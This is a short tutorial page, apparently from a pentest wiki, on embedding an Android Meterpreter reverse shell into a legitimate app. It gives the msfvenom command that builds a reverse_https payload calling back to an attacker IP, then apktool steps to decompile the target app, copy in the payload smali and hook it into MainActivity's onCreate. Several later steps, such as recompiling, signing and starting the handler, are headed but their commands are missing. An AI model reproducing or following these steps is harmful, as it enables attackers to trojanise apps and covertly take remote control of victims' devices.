4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)
Create Payload
msfvenom -p android/meterpreter/reverse_https LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o meterpreter.apkTampering
Decompile meterpreter.apk & original app_name.apk
apktool d -f -o ./payload_apk /path/to/your/meterpreter.apkapktool d -f -o ./original_apk /path/to/your/app_name.apkAdd folder to original project:
mkdir ./original_apk/metasploit; mkdir ./original_apk/metasploit/stage Copy payload files:
cp ./payload_apk/smali/com/metasploit/stage/* ./original_apk/smali/metasploit/stage/Get MainActivity name:
Modify MainActivity.smali
Search for:
;->onCreate(Landroid/os/Bundle;)V
Add another line (following the line above) and paste:
invoke-static {p0}, Lcom/metasploit/stage/Payload; ->start(Landroid/content/Context;)V
Add all necessary app permissions from ./meterpreter/AndroidManifest.xml into the original ./original_apk/AndroidManifest.xml
Recompile:
Sign apk (key-creation + signing):
Install modified apk
Start meterpreter session handler (use same IP & port as you used to generate the payload above):
START APPLICATION ON DEVICE AND HAVE FUN!!! ;)
INFO
Last updated
Was this helpful?